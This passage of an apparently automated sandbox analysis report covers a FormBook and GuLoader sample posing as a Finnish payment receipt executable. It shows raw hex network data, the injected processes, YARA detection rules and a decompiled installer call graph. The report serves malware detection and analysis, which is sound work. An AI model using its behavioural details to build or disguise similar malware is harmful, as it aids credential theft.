                                                                                                                    Data Ascii: `Xu&1I:0C,U<Iw&3}{^Y<3Rnp+@Vz G,0OnEY1y>Q<6vY_uOn~Q$y*+[t+hW(U>M!qI!B~*v+H| L9}^Ow4h?#7w^VDxPyw_2F5N'
                                                                                                                    2023-05-30 09:06:51 UTC177INData Raw: f5 f0 39 e7 c3 bb 85 f7 91 dd ec f0 54 23 00 5e 40 5a 3e 95 6a a9 cc 94 88 17 b4 bf ae 2f f7 8c cd b0 fa 12 33 94 ec a3 00 96 8a fd f4 a6 47 90 be a5 3a 40 c1 c5 9f ec 1e db 19 50 ef f8 88 5f ca b4 09 5f 2d 6a df 39 63 2c 93 93 48 5f 0c 75 f0 2d 5f 28 7a 7a 1d f9 3d 8b b6 b0 10 35 8b 86 65 60 bd 0a 0e 0a 69 45 5e e2 94 15
                                                                                                                    Data Ascii: 9T#^@Z>j/3G:@P__-j9c,H_u-_(zz=5e`iE^
                                                                                                                    2023-05-30 09:06:51 UTC178INData Raw: 22 ce 48 98 f1 45 86 98 2b 83 8d 47 2d 77 94 c1 4a 0c 83 6e 57 95 bb 73 c2 85 6b f2 39 1f 81 78 89 0a e2 ff c0 7a 34 66 a1 b0 91 7e 51 f1 3b de 6e bd 8d 58 c8 5e 19 bf c6 a8 03 c6 b8 9a 81 92 62 9f f3 63 cc 15 51 37 9e 4a 19 18 1c b4 14 26 d9 5b 13 d5 0b f5 d8 2a d0 c6 17 6d f1 2a 3c 66 bc 98 92 1b 46 ec 19 36 f6 70 73 3b dc ee 08 42 b9 1e 8f 4b e8 e1 6a 02 48 3e 0f 65 4e 2e 2f 11 6e 81 d7 59 6f 84 6f 42 2d 67 77 fe c0 e4 5f c7 13 58 c1 ef 79 f3 84 c2 57 98 82 7b 16 e2 f6 61 f4 25 74 cb 82 91 5b 1f fa e6 94 65 70 05 e2 99 ef ab 2f 60 7e bb db 48 d7 9f 93 85 7f fd 34 f6 fe f5 be c0 34 57 af b7 02 40 ff fe 2b bb 91 1c f1 17 4b 3f a8 01 af f3 3d c7 00 a0 22 37 bc 10 a5 63 69 d7 88 79 1b 21 fa 58 ca 72 f9 0c e2 f6 1b f2 18 dd cd 56 0c e5 d8 fd f6 ba de ed aa
                                                                                                                    Data Ascii: "HE+G-wJnWsk9xz4f~Q;nX^bcQ7J&[*m*<fF6ps;BKjH>eN./nYooB-gw_XyW{a%t[ep/`~H44W@+K?="7ciy!XrV
                                                                                                                    2023-05-30 09:06:51 UTC179INData Raw: e7 2d 52 f0 87 89 73 27 fc 2a 47 61 ed 28 89 ca 16 2a 9a ba 50 8c b2 b9 b6 51 1a ff 68 43 d6 a2 9c d5 e0 77 01 58 68 78 ba 02 a9 1d da 0b f5 27 fc 68 a0 f3 e4 27 c5 d5 3e 22 43 88 f3 e2 6c 86 4c 28 57 78 7a 74 5c 10 b8 93 24 ef 69 b5 c6 06 ee b7 eb cd e7 9b e4 cf e7 ef 44 18 52 9c b0 78 62 e8 ff 44 95 93 67 f4 8a 4e c4 f8 4d 7e fb d3 1f a7 4b 30 f1 31 f8 2e 94 6f 9f b5 87 d5 96 19 e8 2f cc 68 7d a0 f8 66 3c 32 f1 1e 62 5b ac 04 7d 1c 14 ba ab ad 84 75 57 f8 fe 8a 9e da a5 85 8c dd 4a fa 57 84 b4 4e c5 5f 17 5c 6d 93 90 39 ac 0b b7 6a 03 fb bc 02 8d dd 3e 27 7f df 05 5e e6 8a b4 8a d4 e8 2d 5c ef 0a 06 67 aa 19 0e 8f 60 07 42 19 02 9b 3e 58 2e 48 df ab 70 db ed 0b 39 f1 32 f2 79 42 63 aa 5e fc ba f4 0e c8 67 e7 47 c4 00 3c 46 e4 75 d6 d9 91 8f 66 38 d8 4e
                                                                                                                    Data Ascii: -Rs'*Ga(*PQhCwXhx'h'>"ClL(Wxzt\$iDRxbDgNM~K01.o/h}f<2b[}uWJWN_\m9j>'^-\g`B>X.Hp92yBc^gG<Fuf8N
                                                                                                                    2023-05-30 09:06:51 UTC180INData Raw: d1 a8 bd 41 69 39 8c c5 2d 68 e9 c9 2c d4 fe f7 5c 7d b6 a8 c9 65 13 92 32 df 43 07 4d 59 a2 13 8e 21 86 0c 1a 42 0a 29 45 e1 7f 50 b6 57 8f 76 94 08 37 45 0c 34 e1 fb 85 34 12 b2 f2 1c e1 2d 3c 24 5e 20 ed c6 87 05 35 68 24 2c 37 af 22 1b ec fa f8 51 52 b4 2e 38 ca db 84 fb 13 bc d3 6c f1 72 01 30 9b 62 d8 b2 47 21 fc cc ad cb 0f 70 13 5d 3e 55 8a 87 68 57 6f 7e 4c 59 f7 d3 30 da 25 88 81 1a 49 d3 a9 01 e5 40 40 8f 45 63 38 2e 4e 8c 8e 78 8d d0 dc 30 ed 8d ce 72 cc e1 fe 4e ee 84 58 81 ac 6c 7e 7a af 34 d7 9c 3c 84 fd 5f e8 ce 6a a1 ee b7 d1 20 1e 21 d1 18 9d 95 70 01 28 25 96 44 c4 8a 43 cd da dd cd b4 b9 0d 15 43 ad 80 c2 9f da cd 7e 99 d5 56 8f 83 23 e3 25 0c bb 0a 4d 06 66 a4 0e a7 af 93 4b 5e 91 e5 cd 55 47 cb d1 84 65 c8 29 8e 29 c7 0b b9 54 ce 5f
                                                                                                                    Data Ascii: Ai9-h,\}e2CMY!B)EPWv7E44-<$^ 5h$,7"QR.8lr0bG!p]>UhWo~LY0%I@@Ec8.Nx0rNXl~z4<_j !p(%DCC~V#%MfK^UGe))T_
                                                                                                                    2023-05-30 09:06:51 UTC181INData Raw: 0f 91 d0 ff 7f b7 b9 08 cf 6d 4f 43 d4 f5 14 6e c7 95 25 33 26 1b 28 45 7e db 43 dd 96 4c b8 11 a4 8e 76 d2 fe cb 17 1b 9e 29 01 44 5d 3e d3 5b d6 c3 f1 5a 2e c5 1d 49 d8 5d 0e 4e 37 7f e6 98 19 8f 7f 97 a2 d6 4b cf a7 10 27 ad d8 3b 45 a2 76 19 6b 84 66 15 0d 8c bd c4 6d 92 41 1c 1b cb 79 71 b5 c2 4f 5a 11 d7 2e 84 19 15 c5 b6 2c fc 30 c3 f6 60 fc c9 02 5a eb c7 bb cf 97 d1 f7 da 0c 36 6d 53 56 a0 77 45 48 c6 b9 16 0f ec 2e 25 fb 2d d7 5c 7b 2b 06 fe a2 b2 1c 57 55 e9 c3 a2 53 a6 16 60 60 6a 05 3a b8 c6 1b 7d 7b db 64 a1 1b fb 88 6f 78 39 8e 36 af 9a 15 68 ca b3 71 0a bb e2 f5 7c 5f cf b1 d5 64 66 73 a3 0c c3 5e f6 96 bb fa 42 96 92 05 0d f9 09 a3 5f 0b 6e 71 4e 3a 11 7c 5b 37 37 99 bb e5 5d 52 44 71 43 41 30 6b db a2 95 38 49 04 9b 20 4a fa b6 4b 8d 55
                                                                                                                    Data Ascii: mOCn%3&(E~CLv)D]>[Z.I]N7K';EvkfmAyqOZ.,0`Z6mSVwEH.%-\{+WUS``j:}{dox96hq|_dfs^B_nqN:|[77]RDqCA0k8I JKU
                                                                                                                    2023-05-30 09:06:51 UTC182INData Raw: 18 63 18 5b a5 22 fc 40 5c 76 cc 99 ce c5 b6 90 88 dc e3 44 d7 90 f5 0f bd 85 15 81 77 80 11 4c 33 4d 00 7a d9 c1 63 9d 61 95 d1 46 fa 6f bf 2e e2 43 29 d2 53 40 e6 48 d5 c1 dd 62 b9 00 be 57 9b d5 4e 54 21 4d a3 42 d8 c9 a6 14 c9 95 98 49 9e 29 d6 1f c6 c9 96 20 2d 2a 4b cb d2 5c 68 1b 5a f9 46 bc 31 a3 69 7e 9d 5e bb ca 0f f4 a0 a2 d7 07 a1 fd db f0 db 26 1f 96 83 b3 85 8f 0a b7 3d d6 ad 70 0d 28 41 e4 a1 05 76 a0 ee 58 b9 a0 ac 34 08 0a be 13 53 52 63 87 81 59 ec 51 1f f0 b4 af ba 0d f2 d4 ba 6b fa ac 4a ac 17 d6 e9 11 7f 13 7c 59 69 dc d7 7e 78 64 16 c3 91 85 af 9d 08 e5 8b 84 a1 07 34 6a 00 76 70 98 ba 0a 83 f4 33 68 a2 47 9d 2d 49 87 d7 ad ac ee 71 4b 29 5f 43 80 47 79 f8 55 ea ea 6c 64 bb 26 9e 77 de 17 20 19 6e 62 cb 48 b9 50 d1 9f 5b ac 10 6d ec
                                                                                                                    Data Ascii: c["@\vDwL3MzcaFo.C)S@HbWNT!MBI) -*K\hZF1i~^&=p(AvX4SRcYQkJ|Yi~xd4jvp3hG-IqK)_CGyUld&w nbHP[m
                                                                                                                    2023-05-30 09:06:51 UTC184INData Raw: 77 ca 72 1c c2 60 b1 47 1e 79 75 f9 20 f7 87 b6 af 5e 80 d7 41 8d 05 47 13 ad c4 1f e3 3f 9a 3f 1d f0 7a 59 71 04 62 db 1f 10 fa 1f e7 47 1b c7 bd e6 15 79 d2 5a 6b d7 22 f2 53 35 da 0c b6 61 02 f4 96 22 54 62 87 ba 76 27 d8 87 6a de 0b 4c 0c 36 c5 0b 68 14 3c 30 11 be f5 e6 21 bd fd d1 2b f7 77 8b d3 94 81 20 d1 57 4c 2c a9 56 3a ef 75 cc 6a 5f 88 3d 63 6f e4 fb e9 d3 40 a4 a0 fe e7 1c d0 07 11 7e df 05 5c 20 5b 01 93 55 f2 63 76 b1 c5 2f aa 14 1c d5 9b a2 49 17 48 21 ba c8 74 32 4c ec 33 73 ee 04 fa c9 d0 f9 ab 91 c9 d7 bc 3f 71 65 60 b7 91 b0 d4 c3 03 70 fa e4 a9 f2 56 ba 5e 9a ba 71 d6 4e a1 fd ee 74 99 ca 2d 7a fd 6d 6d be 97 60 b7 b6 b4 f5 47 cf 41 18 74 0a 98 5a 4e d6 80 80 c8 46 71 7e 97 53 1f ca 76 d8 d6 d2 22 cb 3f 02 90 3a aa 08 b8 cc a6 4c f4
                                                                                                                    Data Ascii: wr`Gyu ^AG??zYqbGyZk"S5a"Tbv'jL6h<0!+w WL,V:uj_=co@~\ [Ucv/IH!t2L3s?qe`pV^qNt-zmm`GAtZNFq~Sv"?:L
                                                                                                                    2023-05-30 09:06:51 UTC185INData Raw: 59 98 19 98 1f fc 64 91 2d e2 20 33 2d 89 66 6b 21 75 bb c6 d2 a3 fe bc 65 e0 a2 f6 01 2d b5 9e 16 50 89 90 3a 76 13 c8 a6 99 88 c5 dc b9 8b 37 3f 1a d7 bb cc d5 89 3a 18 5d 96 89 b2 28 9e fe 00 b8 39 86 47 4e a6 58 f2 9b 07 09 7d 6f 87 bf ed a4 bd 0b be 21 30 b4 49 b9 3b 2b 8c 20 0c df 66 63 cb 51 53 e1 9e 2d 9b 69 25 82 73 26 c7 93 78 40 9b b3 8f ec 3f 78 0c fc 34 c1 e3 06 2b 9d 33 55 23 97 9d 27 4a c8 e3 64 d4 b2 7e b7 b2 d1 bf 31 8c 0f 23 46 96 df 47 0c a2 69 74 22 95 56 09 c7 0d f9 10 84 a8 21 15 f4 bd 00 e7 28 83 3e de 2b ac 89 61 1f 1f 9e 4f de 3f 91 ce 8e 25 05 8e 9f 29 c1 de 83 81 4d 8f 69 a5 60 b6 45 a5 25 04 63 9f 91 50 ae f8 13 49 55 48 6c 2d af cb 41 99 e5 fb eb d2 0c 37 ed 79 47 b7 c1 27 80 94 06 87 c1 60 38 dc 45 d9 56 c7 4f 9b e3 ad 64 a1
                                                                                                                    Data Ascii: Yd- 3-fk!ue-P:v7?:](9GNX}o!0I;+ fcQS-i%s&x@?x4+3U#'Jd~1#FGit"V!(>+aO?%)Mi`E%cPIUHl-A7yG'`8EVOd
                                                                                                                    2023-05-30 09:06:51 UTC186INData Raw: 79 96 02 ea 36 de 10 31 61 ff 1c 6e cf 5d 09 ff 97 84 e6 39 8d 05 5c 01 b2 b7 23 7d ea ba 53 31 4f e3 0d 48 7d 0b 86 62 a7 b6 68 dd 23 e3 73 3c 7f a9 a9 24 13 87 9f 93 03 38 e6 17 75 5f 74 3c 18 df 7b 0c 79 ab 7b 64 30 26 68 66 a0 d2 c6 fd ed 79 f3 47 25 6c e7 8b d0 94 28 8e 6b e6 be 9a ad ec 04 bd f6 56 a5 32 a4 d7 a9 63 ce ea da 9b 4a 2a 4e 08 91 f9 9c a8 81 6e bb 0a fe 1b 78 63 13 da be 4b 1c 68 5c a1 be 80 df 1f e7 b1 8e 29 2b 05 ce d8 9e 69 ff 1d da 46 56 41 a4 bd 31 f7 58 dd a5 3b 00 7e 53 a5 81 fd 46 d0 38 90 d3 f5 9c 3a 5d 8b 1a 34 5c df 7c 06 59 b5 00 11 fa 89 e6 34 69 27 55 66 52 4c ad 84 5e 43 9c 4f cc c8 74 27 09 fa 78 d3 9c c7 a3 e8 af 7f 66 0e 0b 97 88 78 87 65 eb 62 c9 04 1e a5 26 70 b6 2c 6b 29 8f 46 ac 47 89 a8 1e 74 c7 4c 85 31 04 22 47
                                                                                                                    Data Ascii: y61an]9\#}S1OH}bh#s<$8u_t<{y{d0&hfyG%l(kV2cJ*NnxcKh\)+iFVA1X;~SF8:]4\|Y4i'UfRL^COt'xfxeb&p,k)FGtL1"G
                                                                                                                    2023-05-30 09:06:51 UTC187INData Raw: 90 14 d1 eb 4b 66 02 f6 6d 78 5a fc ee 74 df 46 4e 3f 47 b1 4f 24 9f 33 9b 89 a6 08 ee aa d4 8e e3 d4 e0 5a 6e ba ac e2 d1 62 1d 1e f0 ab 3b 68 55 e9 fc b9 c7 b2 5e 10 d2 a6 81 ab c2 75 1a 45 10 55 87 aa a5 9a 46 ec 6d a7 f6 bc 1b 1a 9e d9 0f 1d b6 aa 6b 22 0b df f7 10 45 79 e9 64 8d 2d 4c d9 5a d3 73 ad b5 c2 18 66 05 ef 71 76 b5 43 a2 32 66 a0 b4 ce e5 eb f7 1c 2a fd 93 78 ba d4 3b b9 19 b9 39 b4 c6 7f ad 2e 36 33 38 19 3a 0d 41 2f b1 5e 19 55 e9 51 4f 19 c4 05 11 98 a4 f3 f6 d4 cc 8c fc 66 78 18 5b 2d 10 c1 f8 e0 a8 88 c0 32 0b b9 cf 2c 07 74 91 15 d4 35 b2 4c 4c c8 ea b8 cd 00 dc 80 84 51 42 c1 e3 3c ac 89 d4 6e 80 63 e5 e0 c5 d8 21 40 fd e1 a9 ae a6 8a 0a 5a 38 52 ae d6 5c 27 83 8f 26 49 f3 99 8b 3c 88 46 1d 9c ad e6 90 29 38 ed 8a 68 30 8b 81 88 50
                                                                                                                    Data Ascii: KfmxZtFN?GO$3Znb;hU^uEUFmk"Eyd-LZsfqvC2f*x;9.638:A/^UQOfx[-2,t5LLQB<nc!@Z8R\'&I<F)8h0P
                                                                                                                    2023-05-30 09:06:51 UTC189INData Raw: 33 47 07 9b 56 be 4c 8a cd 8e 3c d8 e0 9d 82 e0 52 54 ef da 84 48 5c c2 1f 16 e0 17 05 f1 fc 6b 51 c6 4d 5a b7 90 36 e9 9a dd 71 ad 69 36 fc 38 f7 9b 6f c9 0c 0b 00 82 f0 46 ce e1 c5 e5 1d bc ee 1f 38 eb 0e 21 9c d0 b3 77 09 50 39 9f 48 80 aa be 0b a7 73 3b 26 d7 91 b2 7d 2d 87 6f fe bf 16 72 db 25 4a cc c6 9e bd 53 71 1a 08 48 14 00 b3 0f ae f0 a7 21 53 12 e4 b7 50 dc 29 7d 4a 80 13 0b d1 63 ff 20 5e b5 05 22 8b d6 6a 9e 67 57 c2 6f a3 26 70 c1 04 36 6f 3d f7 81 c1 8c e6 cb 72 e7 0c ba 00 2f 01 b9 1c 57 a3 aa 5f 26 6e 93 c9 d0 32 2d a6 d8 c5 ff eb bd 85 0b d0 c0 66 60 d0 d4 b8 f9 ae 5e 4b b7 ad 59 be b6 95 03 cc 03 d4 e5 77 7b 72 2a b3 c5 7c b7 4c d3 b2 bd e4 1f 34 8f c6 c3 89 fc c9 68 65 1f ac 53 f3 f6 67 34 a8 d7 63 b8 c1 e1 61 a2 d5 3d 57 35 a2 78 63
                                                                                                                    Data Ascii: 3GVL<RTH\kQMZ6qi68oF8!wP9Hs;&}-or%JSqH!SP)}Jc ^"jgWo&p6o=r/W_&n2-f`^KYw{r*|L4heSg4ca=W5xc
                                                                                                                    2023-05-30 09:06:51 UTC190INData Raw: ea d5 aa 82 b8 9a c2 60 d9 68 13 5f a5 46 2e 21 10 0c a7 d8 fc ff ea 15 3e 0f d5 72 1f 09 cb 45 bd f9 a3 68 73 65 99 e0 43 94 22 4f c6 56 aa 9d c5 ec e2 f6 9e 5e 44 e4 27 88 10 64 f3 60 10 dd 32 1d 0d 56 a4 65 18 94 23 ed cf b5 cd 45 36 7d 27 b2 52 89 05 75 01 2d 86 e6 a6 dc 08 c7 47 4f 65 e7 50 60 f5 0a 64 19 e8 63 fa 58 94 85 d0 a8 d3 01 7e b0 8c 66 cd 79 84 29 a2 13 ae 8f 60 91 f4 5a da 81 18 01 18 e8 91 a7 07 44 a4 7d d4 f4 ac 4a 88 94 3b bb d6 64 16 ee 6e f4 6a ae 55 bd db aa bf ce 8c 28 c6 3d 47 c5 ff 8b b4 64 57 0f 61 95 27 59 eb 85 e3 1b 91 6f c5 54 67 5b 30 cb 7b 36 b9 f8 13 b3 49 f9 ba d9 e8 ce 60 d0 e4 65 58 31 eb 65 b9 38 c5 47 2a 2a ac c9 54 04 40 71 59 6a 5c b9 cb 14 aa 14 17 27 57 50 77 94 dd 63 d3 01 89 23 2a 16 f6 50 85 41 bf 86 db a7 46
                                                                                                                    Data Ascii: `h_F.!>rEhseC"OV^D'd`2Ve#E6}'Ru-GOeP`dcX~fy)`ZD}J;dnjU(=GdWa'YoTg[0{6I`eX1e8G**T@qYj\'WPwc#*PAF
                                                                                                                    2023-05-30 09:06:51 UTC191INData Raw: b8 4d 17 ae 60 36 5d 64 97 20 e5 38 e8 b2 6d a7 77 3f f9 b8 d6 ab f9 35 08 07 d5 26 34 47 a2 78 1c f7 4a 86 dd a6 bf 51 87 e3 23 df c4 da ff 41 b1 22 55 29 7e 51 98 9f 7a 66 ee 4b bc 80 bd 91 f1 c3 f1 d9 96 56 ce 63 77 65 f4 fc 7a 56 23 93 bb 8d 9d 72 fb 84 5f 75 20 5f f7 08 da 57 74 1d 0f 84 ea 45 e5 b6 dc 8e a9 68 5a af 95 01 7f 8c 16 42 a4 c0 20 1e 1e 92 80 3e 11 5c 62 af bc 8e ff fd ce 6a b3 80 0e ec 99 1e be 6e cb b6 dd 16 a2 87 6c c1 87 ef ae 9f a6 10 64 7c f9 9c 64 39 fe f9 9b 28 03 90 88 ca c5 a9 32 7d de 7f f9 18 5e e0 67 7f 63 49 a9 83 48 28 e3 cd 15 f5 5a 70 53 c1 71 02 e2 28 b5 c1 84 58 23 d1 41 0e 6a fe 98 e4 8b 29 51 75 fe 59 1f 5a ff 76 1b 7c 17 82 b5 ed 91 89 44 34 60 89 37 99 5f f6 f0 87 46 a8 9e e4 92 33 60 e3 3c bc 28 2b 03 48 a7 72 e3
                                                                                                                    Data Ascii: M`6]d 8mw?5&4GxJQ#A"U)~QzfKVcwezV#r_u _WtEhZB >\bjnld|d9(2}^gcIH(ZpSq(X#Aj)QuYZv|D4`7_F3`<(+Hr
                                                                                                                    2023-05-30 09:06:51 UTC192INData Raw: 12 1d 02 83 fa 99 03 c8 13 2a e2 88 c4 d9 5f ca b4 e0 ad b3 bc 28 ef 90 2e 5d b9 e9 6a e8 31 6c 59 59 cf e4 40 a8 5e a1 53 71 48 6d 27 92 18 bd 84 ce e9 6f 6b 9a e9 8c 4b 24 24 11 7c 79 43 19 9f 0f 36 6e d6 b8 be f7 75 54 83 00 57 d3 a5 d5 e7 1d 96 69 c7 3d 01 83 73 4a 3a 9f ba 38 34 7d 7c 33 76 39 13 be c7 d8 53 87 cd 1f f8 6f 78 fb c2 f5 a6 c3 f7 e8 69 3b f0 5f 66 08 d1 7d 67 55 e9 5b 0b 23 2d 6a 11 08 1b bf 78 b8 43 ef b3 11 7a e6 ff 84 4f 44 21 9d fb 31 0c 7e 2e c0 17 2a d7 31 40 ac da 6a 60 aa c5 5a 06 86 35 52 1a d4 bd 5a 31 22 df 90 ae 79 bb fc b9 7e 51 9f 0b 4a 9d 82 10 1c
                                                                                                                    Data Ascii: *_(.]j1lYY@^SqHm'okK$$|yC6nuTWi=sJ:84}|3v9Soxi;_f}gU[#-jxCzOD!1~.*1@j`Z5RZ1"y~QJ


                                                                                                                    Click to jump to process

                                                                                                                    Click to jump to process

                                                                                                                    Click to dive into process behavior distribution

                                                                                                                    Click to jump to process

                                                                                                                    Target ID:1
                                                                                                                    Start time:11:05:59
                                                                                                                    Start date:30/05/2023
                                                                                                                    Path:C:\Users\user\Desktop\Siirtokuitti_006703.exe
                                                                                                                    Wow64 process (32bit):true
                                                                                                                    Commandline:C:\Users\user\Desktop\Siirtokuitti_006703.exe
                                                                                                                    Imagebase:0x400000
                                                                                                                    File size:638699 bytes
                                                                                                                    MD5 hash:917202E098F68D9B97DB1A1F685E8D39
                                                                                                                    Has elevated privileges:true
                                                                                                                    Has administrator privileges:true
                                                                                                                    Programmed in:C, C++ or other language
                                                                                                                    Yara matches:
                                                                                                                    • Rule: JoeSecurity_FormBook_1, Description: Yara detected FormBook, Source: 00000001.00000002.19420855305.0000000009150000.00000040.80000000.00040000.00000000.sdmp, Author: Joe Security
                                                                                                                    • Rule: Formbook_1, Description: autogenerated rule brought to you by yara-signator, Source: 00000001.00000002.19420855305.0000000009150000.00000040.80000000.00040000.00000000.sdmp, Author: Felix Bilstein - yara-signator at cocacoding dot com
                                                                                                                    • Rule: Windows_Trojan_Formbook_1112e116, Description: unknown, Source: 00000001.00000002.19420855305.0000000009150000.00000040.80000000.00040000.00000000.sdmp, Author: unknown
                                                                                                                    • Rule: JoeSecurity_GuLoader_2, Description: Yara detected GuLoader, Source: 00000001.00000002.19311035785.000000000849F000.00000040.00001000.00020000.00000000.sdmp, Author: Joe Security
                                                                                                                    Reputation:low

                                                                                                                    Target ID:3
                                                                                                                    Start time:11:06:36
                                                                                                                    Start date:30/05/2023
                                                                                                                    Path:C:\Users\user\Desktop\Siirtokuitti_006703.exe
                                                                                                                    Wow64 process (32bit):true
                                                                                                                    Commandline:C:\Users\user\Desktop\Siirtokuitti_006703.exe
                                                                                                                    Imagebase:0x400000
                                                                                                                    File size:638699 bytes
                                                                                                                    MD5 hash:917202E098F68D9B97DB1A1F685E8D39
                                                                                                                    Has elevated privileges:true
                                                                                                                    Has administrator privileges:true
                                                                                                                    Programmed in:C, C++ or other language
                                                                                                                    Reputation:low

                                                                                                                    Target ID:5
                                                                                                                    Start time:11:06:53
                                                                                                                    Start date:30/05/2023
                                                                                                                    Path:C:\Windows\SysWOW64\mstsc.exe
                                                                                                                    Wow64 process (32bit):true
                                                                                                                    Commandline:C:\Windows\SysWOW64\mstsc.exe
                                                                                                                    Imagebase:0x590000
                                                                                                                    File size:1264640 bytes
                                                                                                                    MD5 hash:B038F39C887BE2A810E20B08613F3B84
                                                                                                                    Has elevated privileges:true
                                                                                                                    Has administrator privileges:true
                                                                                                                    Programmed in:C, C++ or other language
                                                                                                                    Yara matches:
                                                                                                                    • Rule: JoeSecurity_FormBook_1, Description: Yara detected FormBook, Source: 00000005.00000002.23814214008.0000000000330000.00000040.80000000.00040000.00000000.sdmp, Author: Joe Security
                                                                                                                    • Rule: Formbook_1, Description: autogenerated rule brought to you by yara-signator, Source: 00000005.00000002.23814214008.0000000000330000.00000040.80000000.00040000.00000000.sdmp, Author: Felix Bilstein - yara-signator at cocacoding dot com
                                                                                                                    • Rule: Windows_Trojan_Formbook_1112e116, Description: unknown, Source: 00000005.00000002.23814214008.0000000000330000.00000040.80000000.00040000.00000000.sdmp, Author: unknown
                                                                                                                    • Rule: JoeSecurity_FormBook_1, Description: Yara detected FormBook, Source: 00000005.00000002.23831783488.0000000004460000.00000040.10000000.00040000.00000000.sdmp, Author: Joe Security
                                                                                                                    • Rule: Formbook_1, Description: autogenerated rule brought to you by yara-signator, Source: 00000005.00000002.23831783488.0000000004460000.00000040.10000000.00040000.00000000.sdmp, Author: Felix Bilstein - yara-signator at cocacoding dot com
                                                                                                                    • Rule: Windows_Trojan_Formbook_1112e116, Description: unknown, Source: 00000005.00000002.23831783488.0000000004460000.00000040.10000000.00040000.00000000.sdmp, Author: unknown
                                                                                                                    • Rule: JoeSecurity_FormBook_1, Description: Yara detected FormBook, Source: 00000005.00000002.23832424466.0000000004490000.00000004.00000800.00020000.00000000.sdmp, Author: Joe Security
                                                                                                                    • Rule: Formbook_1, Description: autogenerated rule brought to you by yara-signator, Source: 00000005.00000002.23832424466.0000000004490000.00000004.00000800.00020000.00000000.sdmp, Author: Felix Bilstein - yara-signator at cocacoding dot com
                                                                                                                    • Rule: Windows_Trojan_Formbook_1112e116, Description: unknown, Source: 00000005.00000002.23832424466.0000000004490000.00000004.00000800.00020000.00000000.sdmp, Author: unknown
                                                                                                                    Reputation:moderate

                                                                                                                    Target ID:6
                                                                                                                    Start time:11:06:57
                                                                                                                    Start date:30/05/2023
                                                                                                                    Path:C:\Program Files\Realtek\Audio\HDA\RAVCpl64.exe
                                                                                                                    Wow64 process (32bit):false
                                                                                                                    Commandline:"C:\Program Files\Realtek\Audio\HDA\RAVCpl64.exe" -s
                                                                                                                    Imagebase:0x140000000
                                                                                                                    File size:16696840 bytes
                                                                                                                    MD5 hash:731FB4B2E5AFBCADAABB80D642E056AC
                                                                                                                    Has elevated privileges:false
                                                                                                                    Has administrator privileges:false
                                                                                                                    Programmed in:C, C++ or other language
                                                                                                                    Reputation:moderate

                                                                                                                    Target ID:7
                                                                                                                    Start time:11:07:38
                                                                                                                    Start date:30/05/2023
                                                                                                                    Path:C:\Windows\explorer.exe
                                                                                                                    Wow64 process (32bit):false
                                                                                                                    Commandline:C:\Windows\Explorer.EXE
                                                                                                                    Imagebase:0x7ff6bd970000
                                                                                                                    File size:4849904 bytes
                                                                                                                    MD5 hash:5EA66FF5AE5612F921BC9DA23BAC95F7
                                                                                                                    Has elevated privileges:false
                                                                                                                    Has administrator privileges:false
                                                                                                                    Programmed in:C, C++ or other language
                                                                                                                    Reputation:high

                                                                                                                    Target ID:9
                                                                                                                    Start time:11:08:00
                                                                                                                    Start date:30/05/2023
                                                                                                                    Path:C:\Program Files\Mozilla Firefox\firefox.exe
                                                                                                                    Wow64 process (32bit):false
                                                                                                                    Commandline:C:\Program Files\Mozilla Firefox\Firefox.exe
                                                                                                                    Imagebase:0x7ff75fd40000
                                                                                                                    File size:597432 bytes
                                                                                                                    MD5 hash:FA9F4FC5D7ECAB5A20BF7A9D1251C851
                                                                                                                    Has elevated privileges:true
                                                                                                                    Has administrator privileges:true
                                                                                                                    Programmed in:C, C++ or other language
                                                                                                                    Reputation:moderate

                                                                                                                    Target ID:12
                                                                                                                    Start time:11:08:05
                                                                                                                    Start date:30/05/2023
                                                                                                                    Path:C:\Windows\System32\WerFault.exe
                                                                                                                    Wow64 process (32bit):false
                                                                                                                    Commandline:C:\Windows\system32\WerFault.exe -u -p 8968 -s 120
                                                                                                                    Imagebase:0x7ff743940000
                                                                                                                    File size:568632 bytes
                                                                                                                    MD5 hash:5C06542FED8EE68994D43938E7326D75
                                                                                                                    Has elevated privileges:true
                                                                                                                    Has administrator privileges:true
                                                                                                                    Programmed in:C, C++ or other language

                                                                                                                    Reset < >

                                                                                                                      Execution Graph

                                                                                                                      Execution Coverage:3.1%
                                                                                                                      Dynamic/Decrypted Code Coverage:19.1%
                                                                                                                      Signature Coverage:22.2%
                                                                                                                      Total number of Nodes:860
                                                                                                                      Total number of Limit Nodes:49
                                                                                                                      execution_graph 25572 401941 25573 401943 25572->25573 25578 402c37 25573->25578 25579 402c43 25578->25579 25623 4063d2 25579->25623 25582 401948 25584 405abe 25582->25584 25665 405d89 25584->25665 25587 405ae6 DeleteFileW 25589 401951 25587->25589 25588 405afd 25592 405c1d 25588->25592 25679 4063b0 lstrcpynW 25588->25679 25591 405b23 25593 405b36 25591->25593 25594 405b29 lstrcatW 25591->25594 25592->25589 25698 4066f3 FindFirstFileW 25592->25698 25680 405ccd lstrlenW 25593->25680 25596 405b3c 25594->25596 25598 405b4c lstrcatW 25596->25598 25600 405b57 lstrlenW FindFirstFileW 25596->25600 25598->25600 25600->25592 25608 405b79 25600->25608 25601 405c46 25701 405c81 lstrlenW CharPrevW 25601->25701 25604 405c00 FindNextFileW 25604->25608 25609 405c16 FindClose 25604->25609 25607 405c58 25610 405c72 25607->25610 25611 405c5c 25607->25611 25608->25604 25617 405bc1 25608->25617 25684 4063b0 lstrcpynW 25608->25684 25609->25592 25612 405414 24 API calls 25610->25612 25611->25589 25614 405414 24 API calls 25611->25614 25612->25589 25616 405c69 25614->25616 25615 405abe 60 API calls 25615->25617 25705 406176 36 API calls 25616->25705 25617->25604 25617->25615 25618 405414 24 API calls 25617->25618 25685 405a76 RemoveDirectoryW DeleteFileW SetFileAttributesW GetFileAttributesW SetFileAttributesW 25617->25685 25686 405414 25617->25686 25697 406176 36 API calls 25617->25697 25618->25604 25621 405c70 25621->25589 25624 4063df 25623->25624 25625 40662a 25624->25625 25628 4065f8 lstrlenW 25624->25628 25631 4063d2 10 API calls 25624->25631 25633 40650d GetSystemDirectoryW 25624->25633 25634 406520 GetWindowsDirectoryW 25624->25634 25635 406644 5 API calls 25624->25635 25636 4063d2 10 API calls 25624->25636 25637 40659b lstrcatW 25624->25637 25638 406554 SHGetSpecialFolderLocation 25624->25638 25649 40627e 25624->25649 25654 4062f7 wsprintfW 25624->25654 25655 4063b0 lstrcpynW 25624->25655 25626 402c64 25625->25626 25656 4063b0 lstrcpynW 25625->25656 25626->25582 25640 406644 25626->25640 25628->25624 25631->25628 25633->25624 25634->25624 25635->25624 25636->25624 25637->25624 25638->25624 25639 40656c SHGetPathFromIDListW CoTaskMemFree 25638->25639 